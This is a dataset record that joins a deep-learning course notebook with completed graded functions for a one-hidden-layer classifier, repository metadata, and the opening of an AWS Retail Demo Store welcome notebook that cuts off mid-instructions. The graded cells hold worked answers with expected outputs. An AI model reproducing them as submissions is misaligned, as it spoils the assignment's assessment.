\"W2\": W2,\n \"b2\": b2}\n \n return parameters", "_____no_output_____" ], [ "n_x, n_h, n_y = initialize_parameters_test_case()\n\nparameters = initialize_parameters(n_x, n_h, n_y)\nprint(\"W1 = \" + str(parameters[\"W1\"]))\nprint(\"b1 = \" + 
str(parameters[\"b1\"]))\nprint(\"W2 = \" + str(parameters[\"W2\"]))\nprint(\"b2 = \" + str(parameters[\"b2\"]))", "W1 = [[-0.00416758 -0.00056267]\n [-0.02136196 0.01640271]\n [-0.01793436 -0.00841747]\n [ 0.00502881 -0.01245288]]\nb1 = [[ 0.]\n [ 0.]\n [ 0.]\n [ 0.]]\nW2 = [[-0.01057952 -0.00909008 0.00551454 0.02292208]]\nb2 = [[ 0.]]\n" ] ], [ [ "**Expected Output**:\n\n<table style=\"width:90%\">\n <tr>\n <td>**W1**</td>\n <td> [[-0.00416758 -0.00056267]\n [-0.02136196 0.01640271]\n [-0.01793436 -0.00841747]\n [ 0.00502881 -0.01245288]] </td> \n </tr>\n \n <tr>\n <td>**b1**</td>\n <td> [[ 0.]\n [ 0.]\n [ 0.]\n [ 0.]] </td> \n </tr>\n \n <tr>\n <td>**W2**</td>\n <td> [[-0.01057952 -0.00909008 0.00551454 0.02292208]]</td> \n </tr>\n \n\n <tr>\n <td>**b2**</td>\n <td> [[ 0.]] </td> \n </tr>\n \n</table>\n\n", "_____no_output_____" ], [ "### 4.3 - The Loop ####\n\n**Question**: Implement `forward_propagation()`.\n\n**Instructions**:\n- Look above at the mathematical representation of your classifier.\n- You can use the function `sigmoid()`. It is built-in (imported) in the notebook.\n- You can use the function `np.tanh()`. It is part of the numpy library.\n- The steps you have to implement are:\n 1. Retrieve each parameter from the dictionary \"parameters\" (which is the output of `initialize_parameters()`) by using `parameters[\"..\"]`.\n 2. Implement Forward Propagation. Compute $Z^{[1]}, A^{[1]}, Z^{[2]}$ and $A^{[2]}$ (the vector of all your predictions on all the examples in the training set).\n- Values needed in the backpropagation are stored in \"`cache`\". 
The `cache` will be given as an input to the backpropagation function.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: forward_propagation\n\ndef forward_propagation(X, parameters):\n \"\"\"\n Argument:\n X -- input data of size (n_x, m)\n parameters -- python dictionary containing your parameters (output of initialization function)\n \n Returns:\n A2 -- The sigmoid output of the second activation\n cache -- a dictionary containing \"Z1\", \"A1\", \"Z2\" and \"A2\"\n \"\"\"\n # Retrieve each parameter from the dictionary \"parameters\"\n ### START CODE HERE ### (≈ 4 lines of code)\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n ### END CODE HERE ###\n \n # Implement Forward Propagation to calculate A2 (probabilities)\n ### START CODE HERE ### (≈ 4 lines of code)\n Z1 = np.dot(W1, X) + b1\n A1 = np.tanh(Z1)\n Z2 = np.dot(W2,A1) + b2\n A2 = sigmoid(Z2)\n ### END CODE HERE ###\n \n assert(A2.shape == (1, X.shape[1]))\n \n cache = {\"Z1\": Z1,\n \"A1\": A1,\n \"Z2\": Z2,\n \"A2\": A2}\n \n return A2, cache", "_____no_output_____" ], [ "X_assess, parameters = forward_propagation_test_case()\nA2, cache = forward_propagation(X_assess, parameters)\n\n# Note: we use the mean here just to make sure that your output matches ours. 
\nprint(np.mean(cache['Z1']) ,np.mean(cache['A1']),np.mean(cache['Z2']),np.mean(cache['A2']))", "0.262818640198 0.091999045227 -1.30766601287 0.212877681719\n" ] ], [ [ "**Expected Output**:\n<table style=\"width:50%\">\n <tr>\n <td> 0.262818640198 0.091999045227 -1.30766601287 0.212877681719 </td> \n </tr>\n</table>", "_____no_output_____" ], [ "Now that you have computed $A^{[2]}$ (in the Python variable \"`A2`\"), which contains $a^{[2](i)}$ for every example, you can compute the cost function as follows:\n\n$$J = - \\frac{1}{m} \\sum\\limits_{i = 1}^{m} \\large{(} \\small y^{(i)}\\log\\left(a^{[2] (i)}\\right) + (1-y^{(i)})\\log\\left(1- a^{[2] (i)}\\right) \\large{)} \\small\\tag{13}$$\n\n**Exercise**: Implement `compute_cost()` to compute the value of the cost $J$.\n\n**Instructions**:\n- There are many ways to implement the cross-entropy loss. To help you, we give you how we would have implemented\n$- \\sum\\limits_{i=0}^{m} y^{(i)}\\log(a^{[2](i)})$:\n```python\nlogprobs = np.multiply(np.log(A2),Y)\ncost = - np.sum(logprobs) # no need to use a for loop!\n```\n\n(you can use either `np.multiply()` and then `np.sum()` or directly `np.dot()`). \nNote that if you use `np.multiply` followed by `np.sum` the end result will be a type `float`, whereas if you use `np.dot`, the result will be a 2D numpy array. We can use `np.squeeze()` to remove redundant dimensions (in the case of single float, this will be reduced to a zero-dimension array). 
We can cast the array as a type `float` using `float()`.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: compute_cost\n\ndef compute_cost(A2, Y, parameters):\n \"\"\"\n Computes the cross-entropy cost given in equation (13)\n \n Arguments:\n A2 -- The sigmoid output of the second activation, of shape (1, number of examples)\n Y -- \"true\" labels vector of shape (1, number of examples)\n parameters -- python dictionary containing your parameters W1, b1, W2 and b2\n [Note that the parameters argument is not used in this function, \n but the auto-grader currently expects this parameter.\n Future version of this notebook will fix both the notebook \n and the auto-grader so that `parameters` is not needed.\n For now, please include `parameters` in the function signature,\n and also when invoking this function.]\n \n Returns:\n cost -- cross-entropy cost given equation (13)\n \n \"\"\"\n \n m = Y.shape[1] # number of example\n\n # Compute the cross-entropy cost\n ### START CODE HERE ### (≈ 2 lines of code)\n logprobs = np.multiply(np.log(A2), Y) + np.multiply((1 - Y), np.log(1 - A2))\n cost = - np.sum(logprobs) / m \n ### END CODE HERE ###\n \n cost = float(np.squeeze(cost)) # makes sure cost is the dimension we expect. \n # E.g., turns [[17]] into 17 \n assert(isinstance(cost, float))\n \n return cost", "_____no_output_____" ], [ "A2, Y_assess, parameters = compute_cost_test_case()\n\nprint(\"cost = \" + str(compute_cost(A2, Y_assess, parameters)))", "cost = 0.6930587610394646\n" ] ], [ [ "**Expected Output**:\n<table style=\"width:20%\">\n <tr>\n <td>**cost**</td>\n <td> 0.693058761... </td> \n </tr>\n \n</table>", "_____no_output_____" ], [ "Using the cache computed during forward propagation, you can now implement backward propagation.\n\n**Question**: Implement the function `backward_propagation()`.\n\n**Instructions**:\nBackpropagation is usually the hardest (most mathematical) part in deep learning. 
To help you, here again is the slide from the lecture on backpropagation. You'll want to use the six equations on the right of this slide, since you are building a vectorized implementation. \n\n<img src=\"images/grad_summary.png\" style=\"width:600px;height:300px;\">\n\n<!--\n$\\frac{\\partial \\mathcal{J} }{ \\partial z_{2}^{(i)} } = \\frac{1}{m} (a^{[2](i)} - y^{(i)})$\n\n$\\frac{\\partial \\mathcal{J} }{ \\partial W_2 } = \\frac{\\partial \\mathcal{J} }{ \\partial z_{2}^{(i)} } a^{[1] (i) T} $\n\n$\\frac{\\partial \\mathcal{J} }{ \\partial b_2 } = \\sum_i{\\frac{\\partial \\mathcal{J} }{ \\partial z_{2}^{(i)}}}$\n\n$\\frac{\\partial \\mathcal{J} }{ \\partial z_{1}^{(i)} } = W_2^T \\frac{\\partial \\mathcal{J} }{ \\partial z_{2}^{(i)} } * ( 1 - a^{[1] (i) 2}) $\n\n$\\frac{\\partial \\mathcal{J} }{ \\partial W_1 } = \\frac{\\partial \\mathcal{J} }{ \\partial z_{1}^{(i)} } X^T $\n\n$\\frac{\\partial \\mathcal{J} _i }{ \\partial b_1 } = \\sum_i{\\frac{\\partial \\mathcal{J} }{ \\partial z_{1}^{(i)}}}$\n\n- Note that $*$ denotes elementwise multiplication.\n- The notation you will use is common in deep learning coding:\n - dW1 = $\\frac{\\partial \\mathcal{J} }{ \\partial W_1 }$\n - db1 = $\\frac{\\partial \\mathcal{J} }{ \\partial b_1 }$\n - dW2 = $\\frac{\\partial \\mathcal{J} }{ \\partial W_2 }$\n - db2 = $\\frac{\\partial \\mathcal{J} }{ \\partial b_2 }$\n \n!-->\n\n- Tips:\n - To compute dZ1 you'll need to compute $g^{[1]'}(Z^{[1]})$. Since $g^{[1]}(.)$ is the tanh activation function, if $a = g^{[1]}(z)$ then $g^{[1]'}(z) = 1-a^2$. 
So you can compute \n $g^{[1]'}(Z^{[1]})$ using `(1 - np.power(A1, 2))`.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: backward_propagation\n\ndef backward_propagation(parameters, cache, X, Y):\n \"\"\"\n Implement the backward propagation using the instructions above.\n \n Arguments:\n parameters -- python dictionary containing our parameters \n cache -- a dictionary containing \"Z1\", \"A1\", \"Z2\" and \"A2\".\n X -- input data of shape (2, number of examples)\n Y -- \"true\" labels vector of shape (1, number of examples)\n \n Returns:\n grads -- python dictionary containing your gradients with respect to different parameters\n \"\"\"\n m = X.shape[1]\n \n # First, retrieve W1 and W2 from the dictionary \"parameters\".\n ### START CODE HERE ### (≈ 2 lines of code)\n W1 = parameters[\"W1\"]\n W2 = parameters[\"W2\"]\n ### END CODE HERE ###\n \n # Retrieve also A1 and A2 from dictionary \"cache\".\n ### START CODE HERE ### (≈ 2 lines of code)\n A1 = cache[\"A1\"]\n A2 = cache[\"A2\"]\n ### END CODE HERE ###\n \n # Backward propagation: calculate dW1, db1, dW2, db2. 
\n ### START CODE HERE ### (≈ 6 lines of code, corresponding to 6 equations on slide above)\n dZ2 = A2 - Y\n dW2 = 1/m * np.dot(dZ2, A1.T)\n db2 = 1/m * np.sum(dZ2, axis = 1, keepdims = True)\n dZ1 = np.dot(W2.T, dZ2) * (1 - np.power(A1, 2))\n dW1 = 1/m * np.dot(dZ1, X.T)\n db1 = 1/m * np.sum(dZ1, axis = 1, keepdims = True)\n ### END CODE HERE ###\n \n grads = {\"dW1\": dW1,\n \"db1\": db1,\n \"dW2\": dW2,\n \"db2\": db2}\n \n return grads", "_____no_output_____" ], [ "parameters, cache, X_assess, Y_assess = backward_propagation_test_case()\n\ngrads = backward_propagation(parameters, cache, X_assess, Y_assess)\nprint (\"dW1 = \"+ str(grads[\"dW1\"]))\nprint (\"db1 = \"+ str(grads[\"db1\"]))\nprint (\"dW2 = \"+ str(grads[\"dW2\"]))\nprint (\"db2 = \"+ str(grads[\"db2\"]))", "dW1 = [[ 0.00301023 -0.00747267]\n [ 0.00257968 -0.00641288]\n [-0.00156892 0.003893 ]\n [-0.00652037 0.01618243]]\ndb1 = [[ 0.00176201]\n [ 0.00150995]\n [-0.00091736]\n [-0.00381422]]\ndW2 = [[ 0.00078841 0.01765429 -0.00084166 -0.01022527]]\ndb2 = [[-0.16655712]]\n" ] ], [ [ "**Expected output**:\n\n\n\n<table style=\"width:80%\">\n <tr>\n <td>**dW1**</td>\n <td> [[ 0.00301023 -0.00747267]\n [ 0.00257968 -0.00641288]\n [-0.00156892 0.003893 ]\n [-0.00652037 0.01618243]] </td> \n </tr>\n \n <tr>\n <td>**db1**</td>\n <td> [[ 0.00176201]\n [ 0.00150995]\n [-0.00091736]\n [-0.00381422]] </td> \n </tr>\n \n <tr>\n <td>**dW2**</td>\n <td> [[ 0.00078841 0.01765429 -0.00084166 -0.01022527]] </td> \n </tr>\n \n\n <tr>\n <td>**db2**</td>\n <td> [[-0.16655712]] </td> \n </tr>\n \n</table> ", "_____no_output_____" ], [ "**Question**: Implement the update rule. Use gradient descent. 
You have to use (dW1, db1, dW2, db2) in order to update (W1, b1, W2, b2).\n\n**General gradient descent rule**: $ \\theta = \\theta - \\alpha \\frac{\\partial J }{ \\partial \\theta }$ where $\\alpha$ is the learning rate and $\\theta$ represents a parameter.\n\n**Illustration**: The gradient descent algorithm with a good learning rate (converging) and a bad learning rate (diverging). Images courtesy of Adam Harley.\n\n<img src=\"images/sgd.gif\" style=\"width:400;height:400;\"> <img src=\"images/sgd_bad.gif\" style=\"width:400;height:400;\">\n\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: update_parameters\n\ndef update_parameters(parameters, grads, learning_rate = 1.2):\n \"\"\"\n Updates parameters using the gradient descent update rule given above\n \n Arguments:\n parameters -- python dictionary containing your parameters \n grads -- python dictionary containing your gradients \n \n Returns:\n parameters -- python dictionary containing your updated parameters \n \"\"\"\n # Retrieve each parameter from the dictionary \"parameters\"\n ### START CODE HERE ### (≈ 4 lines of code)\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n ### END CODE HERE ###\n \n # Retrieve each gradient from the dictionary \"grads\"\n ### START CODE HERE ### (≈ 4 lines of code)\n dW1 = grads[\"dW1\"]\n db1 = grads[\"db1\"]\n dW2 = grads[\"dW2\"]\n db2 = grads[\"db2\"]\n ## END CODE HERE ###\n \n # Update rule for each parameter\n ### START CODE HERE ### (≈ 4 lines of code)\n W1 = W1 - learning_rate * dW1\n b1 = b1 - learning_rate * db1\n W2 = W2 - learning_rate * dW2\n b2 = b2 - learning_rate * db2\n ### END CODE HERE ###\n \n parameters = {\"W1\": W1,\n \"b1\": b1,\n \"W2\": W2,\n \"b2\": b2}\n \n return parameters", "_____no_output_____" ], [ "parameters, grads = update_parameters_test_case()\nparameters = update_parameters(parameters, grads)\n\nprint(\"W1 = \" + str(parameters[\"W1\"]))\nprint(\"b1 = \" + 
str(parameters[\"b1\"]))\nprint(\"W2 = \" + str(parameters[\"W2\"]))\nprint(\"b2 = \" + str(parameters[\"b2\"]))", "W1 = [[-0.00643025 0.01936718]\n [-0.02410458 0.03978052]\n [-0.01653973 -0.02096177]\n [ 0.01046864 -0.05990141]]\nb1 = [[ -1.02420756e-06]\n [ 1.27373948e-05]\n [ 8.32996807e-07]\n [ -3.20136836e-06]]\nW2 = [[-0.01041081 -0.04463285 0.01758031 0.04747113]]\nb2 = [[ 0.00010457]]\n" ] ], [ [ "**Expected Output**:\n\n\n<table style=\"width:80%\">\n <tr>\n <td>**W1**</td>\n <td> [[-0.00643025 0.01936718]\n [-0.02410458 0.03978052]\n [-0.01653973 -0.02096177]\n [ 0.01046864 -0.05990141]]</td> \n </tr>\n \n <tr>\n <td>**b1**</td>\n <td> [[ -1.02420756e-06]\n [ 1.27373948e-05]\n [ 8.32996807e-07]\n [ -3.20136836e-06]]</td> \n </tr>\n \n <tr>\n <td>**W2**</td>\n <td> [[-0.01041081 -0.04463285 0.01758031 0.04747113]] </td> \n </tr>\n \n\n <tr>\n <td>**b2**</td>\n <td> [[ 0.00010457]] </td> \n </tr>\n \n</table> ", "_____no_output_____" ], [ "### 4.4 - Integrate parts 4.1, 4.2 and 4.3 in nn_model() ####\n\n**Question**: Build your neural network model in `nn_model()`.\n\n**Instructions**: The neural network model has to use the previous functions in the right order.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: nn_model\n\ndef nn_model(X, Y, n_h, num_iterations = 10000, print_cost=False):\n \"\"\"\n Arguments:\n X -- dataset of shape (2, number of examples)\n Y -- labels of shape (1, number of examples)\n n_h -- size of the hidden layer\n num_iterations -- Number of iterations in gradient descent loop\n print_cost -- if True, print the cost every 1000 iterations\n \n Returns:\n parameters -- parameters learnt by the model. 
They can then be used to predict.\n \"\"\"\n \n np.random.seed(3)\n n_x = layer_sizes(X, Y)[0]\n n_y = layer_sizes(X, Y)[2]\n \n # Initialize parameters\n ### START CODE HERE ### (≈ 1 line of code)\n parameters = initialize_parameters(n_x, n_h, n_y)\n ### END CODE HERE ###\n \n # Loop (gradient descent)\n\n for i in range(0, num_iterations):\n \n ### START CODE HERE ### (≈ 4 lines of code)\n # Forward propagation. Inputs: \"X, parameters\". Outputs: \"A2, cache\".\n A2, cache = forward_propagation(X, parameters)\n \n # Cost function. Inputs: \"A2, Y, parameters\". Outputs: \"cost\".\n cost = compute_cost(A2, Y, parameters)\n \n # Backpropagation. Inputs: \"parameters, cache, X, Y\". Outputs: \"grads\".\n grads = backward_propagation(parameters, cache, X, Y)\n \n # Gradient descent parameter update. Inputs: \"parameters, grads\". Outputs: \"parameters\".\n parameters = update_parameters(parameters, grads)\n \n ### END CODE HERE ###\n \n # Print the cost every 1000 iterations\n if print_cost and i % 1000 == 0:\n print (\"Cost after iteration %i: %f\" %(i, cost))\n\n return parameters", "_____no_output_____" ], [ "X_assess, Y_assess = nn_model_test_case()\nparameters = nn_model(X_assess, Y_assess, 4, num_iterations=10000, print_cost=True)\nprint(\"W1 = \" + str(parameters[\"W1\"]))\nprint(\"b1 = \" + str(parameters[\"b1\"]))\nprint(\"W2 = \" + str(parameters[\"W2\"]))\nprint(\"b2 = \" + str(parameters[\"b2\"]))", "Cost after iteration 0: 0.692739\nCost after iteration 1000: 0.000218\nCost after iteration 2000: 0.000107\nCost after iteration 3000: 0.000071\nCost after iteration 4000: 0.000053\nCost after iteration 5000: 0.000042\nCost after iteration 6000: 0.000035\nCost after iteration 7000: 0.000030\nCost after iteration 8000: 0.000026\nCost after iteration 9000: 0.000023\nW1 = [[-0.65848169 1.21866811]\n [-0.76204273 1.39377573]\n [ 0.5792005 -1.10397703]\n [ 0.76773391 -1.41477129]]\nb1 = [[ 0.287592 ]\n [ 0.3511264 ]\n [-0.2431246 ]\n [-0.35772805]]\nW2 = 
[[-2.45566237 -3.27042274 2.00784958 3.36773273]]\nb2 = [[ 0.20459656]]\n" ] ], [ [ "**Expected Output**:\n\n<table style=\"width:90%\">\n\n<tr> \n <td> \n **cost after iteration 0**\n </td>\n <td> \n 0.692739\n </td>\n</tr>\n\n<tr> \n <td> \n <center> $\\vdots$ </center>\n </td>\n <td> \n <center> $\\vdots$ </center>\n </td>\n</tr>\n\n <tr>\n <td>**W1**</td>\n <td> [[-0.65848169 1.21866811]\n [-0.76204273 1.39377573]\n [ 0.5792005 -1.10397703]\n [ 0.76773391 -1.41477129]]</td> \n </tr>\n \n <tr>\n <td>**b1**</td>\n <td> [[ 0.287592 ]\n [ 0.3511264 ]\n [-0.2431246 ]\n [-0.35772805]] </td> \n </tr>\n \n <tr>\n <td>**W2**</td>\n <td> [[-2.45566237 -3.27042274 2.00784958 3.36773273]] </td> \n </tr>\n \n\n <tr>\n <td>**b2**</td>\n <td> [[ 0.20459656]] </td> \n </tr>\n \n</table> ", "_____no_output_____" ], [ "### 4.5 Predictions\n\n**Question**: Use your model to predict by building predict().\nUse forward propagation to predict results.\n\n**Reminder**: predictions = $y_{prediction} = \\mathbb 1 \\text{{activation > 0.5}} = \\begin{cases}\n 1 & \\text{if}\\ activation > 0.5 \\\\\n 0 & \\text{otherwise}\n \\end{cases}$ \n \nAs an example, if you would like to set the entries of a matrix X to 0 and 1 based on a threshold you would do: ```X_new = (X > threshold)```", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: predict\n\ndef predict(parameters, X):\n \"\"\"\n Using the learned parameters, predicts a class for each example in X\n \n Arguments:\n parameters -- python dictionary containing your parameters \n X -- input data of size (n_x, m)\n \n Returns\n predictions -- vector of predictions of our model (red: 0 / blue: 1)\n \"\"\"\n \n # Computes probabilities using forward propagation, and classifies to 0/1 using 0.5 as the threshold.\n ### START CODE HERE ### (≈ 2 lines of code)\n A2, cache = forward_propagation(X, parameters)\n predictions = np.round(A2)\n ### END CODE HERE ###\n \n return predictions", "_____no_output_____" ], [ "parameters, X_assess = 
predict_test_case()\n\npredictions = predict(parameters, X_assess)\nprint(\"predictions mean = \" + str(np.mean(predictions)))", "predictions mean = 0.666666666667\n" ] ], [ [ "**Expected Output**: \n\n\n<table style=\"width:40%\">\n <tr>\n <td>**predictions mean**</td>\n <td> 0.666666666667 </td> \n </tr>\n \n</table>", "_____no_output_____" ], [ "It is time to run the model and see how it performs on a planar dataset. Run the following code to test your model with a single hidden layer of $n_h$ hidden units.", "_____no_output_____" ] ], [ [ "# Build a model with a n_h-dimensional hidden layer\nparameters = nn_model(X, Y, n_h = 4, num_iterations = 10000, print_cost=True)\n\n# Plot the decision boundary\nplot_decision_boundary(lambda x: predict(parameters, x.T), X, Y)\nplt.title(\"Decision Boundary for hidden layer size \" + str(4))", "Cost after iteration 0: 0.693048\nCost after iteration 1000: 0.288083\nCost after iteration 2000: 0.254385\nCost after iteration 3000: 0.233864\nCost after iteration 4000: 0.226792\nCost after iteration 5000: 0.222644\nCost after iteration 6000: 0.219731\nCost after iteration 7000: 0.217504\nCost after iteration 8000: 0.219471\nCost after iteration 9000: 0.218612\n" ] ], [ [ "**Expected Output**:\n\n<table style=\"width:40%\">\n <tr>\n <td>**Cost after iteration 9000**</td>\n <td> 0.218607 </td> \n </tr>\n \n</table>\n", "_____no_output_____" ] ], [ [ "# Print accuracy\npredictions = predict(parameters, X)\nprint ('Accuracy: %d' % float((np.dot(Y,predictions.T) + np.dot(1-Y,1-predictions.T))/float(Y.size)*100) + '%')", "Accuracy: 90%\n" ] ], [ [ "**Expected Output**: \n\n<table style=\"width:15%\">\n <tr>\n <td>**Accuracy**</td>\n <td> 90% </td> \n </tr>\n</table>", "_____no_output_____" ], [ "Accuracy is really high compared to Logistic Regression. The model has learnt the leaf patterns of the flower! Neural networks are able to learn even highly non-linear decision boundaries, unlike logistic regression. 
\n\nNow, let's try out several hidden layer sizes.", "_____no_output_____" ], [ "### 4.6 - Tuning hidden layer size (optional/ungraded exercise) ###\n\nRun the following code. It may take 1-2 minutes. You will observe different behaviors of the model for various hidden layer sizes.", "_____no_output_____" ] ], [ [ "# This may take about 2 minutes to run\n\nplt.figure(figsize=(16, 32))\nhidden_layer_sizes = [1, 2, 3, 4, 5, 20, 50]\nfor i, n_h in enumerate(hidden_layer_sizes):\n plt.subplot(5, 2, i+1)\n plt.title('Hidden Layer of size %d' % n_h)\n parameters = nn_model(X, Y, n_h, num_iterations = 5000)\n plot_decision_boundary(lambda x: predict(parameters, x.T), X, Y)\n predictions = predict(parameters, X)\n accuracy = float((np.dot(Y,predictions.T) + np.dot(1-Y,1-predictions.T))/float(Y.size)*100)\n print (\"Accuracy for {} hidden units: {} %\".format(n_h, accuracy))", "Accuracy for 1 hidden units: 67.5 %\nAccuracy for 2 hidden units: 67.25 %\nAccuracy for 3 hidden units: 90.75 %\nAccuracy for 4 hidden units: 90.5 %\nAccuracy for 5 hidden units: 91.25 %\nAccuracy for 20 hidden units: 90.0 %\nAccuracy for 50 hidden units: 90.25 %\n" ] ], [ [ "**Interpretation**:\n- The larger models (with more hidden units) are able to fit the training set better, until eventually the largest models overfit the data. \n- The best hidden layer size seems to be around n_h = 5. Indeed, a value around here seems to fits the data well without also incurring noticeable overfitting.\n- You will also learn later about regularization, which lets you use very large models (such as n_h = 50) without much overfitting. ", "_____no_output_____" ], [ "**Optional questions**:\n\n**Note**: Remember to submit the assignment by clicking the blue \"Submit Assignment\" button at the upper-right. \n\nSome optional/ungraded questions that you can explore if you wish: \n- What happens when you change the tanh activation for a sigmoid activation or a ReLU activation?\n- Play with the learning_rate. 
What happens?\n- What if we change the dataset? (See part 5 below!)", "_____no_output_____" ], [ "<font color='blue'>\n**You've learnt to:**\n- Build a complete neural network with a hidden layer\n- Make a good use of a non-linear unit\n- Implemented forward propagation and backpropagation, and trained a neural network\n- See the impact of varying the hidden layer size, including overfitting.", "_____no_output_____" ], [ "Nice work! ", "_____no_output_____" ], [ "## 5) Performance on other datasets", "_____no_output_____" ], [ "If you want, you can rerun the whole notebook (minus the dataset part) for each of the following datasets.", "_____no_output_____" ] ], [ [ "# Datasets\nnoisy_circles, noisy_moons, blobs, gaussian_quantiles, no_structure = load_extra_datasets()\n\ndatasets = {\"noisy_circles\": noisy_circles,\n \"noisy_moons\": noisy_moons,\n \"blobs\": blobs,\n \"gaussian_quantiles\": gaussian_quantiles}\n\n### START CODE HERE ### (choose your dataset)\ndataset = \"noisy_moons\"\n### END CODE HERE ###\n\nX, Y = datasets[dataset]\nX, Y = X.T, Y.reshape(1, Y.shape[0])\n\n# make blobs binary\nif dataset == \"blobs\":\n Y = Y%2\n\n# Visualize the data\nplt.scatter(X[0, :], X[1, :], c=Y, s=40, cmap=plt.cm.Spectral);", "_____no_output_____" ] ], [ [ "Congrats on finishing this Programming Assignment!\n\nReference:\n- http://scs.ryerson.ca/~aharley/neural-networks/\n- http://cs231n.github.io/neural-networks-case-study/", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ] ]
e72eb844928b279123e59e515e861956c642218b
10,499
ipynb
Jupyter Notebook
workshop/Welcome.ipynb
lvthillo/retail-demo-store
20a42c3fcde7fa27bf528adb6bf8bdca5642ef81
[ "MIT-0" ]
null
null
null
workshop/Welcome.ipynb
lvthillo/retail-demo-store
20a42c3fcde7fa27bf528adb6bf8bdca5642ef81
[ "MIT-0" ]
null
null
null
workshop/Welcome.ipynb
lvthillo/retail-demo-store
20a42c3fcde7fa27bf528adb6bf8bdca5642ef81
[ "MIT-0" ]
null
null
null
68.175325
638
0.712925
[ [ [ "# Welcome to the Retail Demo Store Workshops\n\nThe workshops in this project are designed to walk you through incrementally adding functionality to the base Retail Demo Store application. Some of the workshops build on each other so it is recommended to follow the workshops in order unless otherwise instructed as part of an organized event or workshop.\n\n**IMPORTANT: The workshops are implemented using Jupyter notebooks that are designed to be executed from a SageMaker Notebook instance in an AWS account where the Retail Demo Store has been deployed. Therefore, the notebooks may not be fully functional outside AWS such as on your local machine. The Retail Demo Store's deployment templates will create the SageMaker Notebook instance and preload the workshop notebooks for you.**\n\n## Retail Demo Store Architecture\n\nBefore opening and walking through the workshops, let's get familiar with the Retail Demo Store architecture and infrastructure deployed into your AWS account. Establishing this foundation will make the workshops more understandable and relatable back to the functionality being enhanced.\n\nThe core of the Retail Demo Store is a polyglot microservice architecture deployed as a collection of RESTful web services in [Amazon Elastic Container Service](https://aws.amazon.com/ecs/) (ECS). Several AWS managed services are leveraged to provide build, deployment, authentication, messaging, search, and personalization capabilities. \n\n![Retail Demo Store Architecture](./images/retaildemostore-architecture.png)\n\n### Microservices\n\nThe **Web UI** container service (located in ECS rectangle in the above diagram) is used to provide the user interface for the Retail Demo Store. 
It uses the [Vue.js](https://vuejs.org/) JavaScript framework for UI components, [Axios](https://github.com/axios/axios) to communicate with back-end web service APIs, and [AWS Amplify](https://aws.amazon.com/amplify/) to integrate with [Amazon Cognito](https://aws.amazon.com/cognito/) for authentication and [Amazon Pinpoint](https://aws.amazon.com/pinpoint/) for capturing user behavior and clickstream data.\n\nThe **Users**, **Products**, **Carts**, and **Orders** web services provide access to retrieving and updating each respective entity type. These services are built with the [Golang](https://golang.org/) programming languge and provide very basic implementations.\n\nThe **Search** service leverages [Amazon Elasticsearch](https://aws.amazon.com/elasticsearch-service/) to power user-entered product queries. The first workshop walks you through creating and populating the index.\n\nThe **Recommendations** service provides user and related product recommendations and personalized ranking of products. In its default launch state, the service lacks the ability to provide personalization. The second workshop steps you through how to use [Amazon Personalize](https://aws.amazon.com/personalize/) to activate the personalization capabilities in the Recommendations service.\n\n### Support Services\n\nRetail Demo Store's microservices and workshops make extensive use of [AWS Cloud Map](https://aws.amazon.com/cloud-map/) to discover the private addresses of microservices and [AWS Systems Manager Parameter Store](https://docs.aws.amazon.com/systems-manager/latest/userguide/systems-manager-parameter-store.html) to store and discover important system configuration values that effect how the services behave. 
For example, once the Amazon Personalize campaigns are built in the Personalization workshop, the ARNs are saved as SSM Parameters that the Recommendations microservice uses to retrieve recommendations from Personalize.\n\nYou are encouraged to explore these services in the AWS console as you work through the workshops to see how they're utilized by the Retail Demo Store.\n\n### Build and Deployment Pipeline\n\nRetail Demo Store uses [AWS CodePipeline](https://aws.amazon.com/codepipeline/) to automatically build and deploy the microservices when a change is detected in the code repository (AWS CodeCommit or GitHub).\n\n### Source Code\n\nUnless you deployed the Retail Demo Store via a linked GitHub repository (in which case you already have access to the source code), you can view all source code for the Retail Demo Store's microservices and notebooks in the [AWS CodeCommit](https://aws.amazon.com/codecommit/) Git repositories deployed in this AWS account.\n\n## User Interface Instructions\n\nWhen the Retail Demo Store was deployed in your account by CloudFormation, a load balancer was created that can be used to access the Web User Interface service. The CloudFormation template provides the URL of the load balancer as an Output parameter. Browse to the CloudFormation console in this AWS account, click on the Retail Demo Store's stack, then on the \"Outputs\" tab, and finally locate the key named \"WebURL\". Open this URL in a separate web browser tab/window.\n\n![CloudFormation Outputs](./images/cfn-webui-outputs.png)\n\nWhen you access the WebURL you should see the Retail Demo Store home page.\n\n![Retail Demo Store Home Page](./images/retaildemostore-home.png)\n\n### Create Retail Demo Store User Account\n\n#### 1. Access Create Account\n\nClick the \"Sign In\" button and then the \"Create account\" link on the sign in view.\n\n![Retail Demo Store Create Account](./images/retaildemostore-create-acct-link.png)\n\n#### 2. 
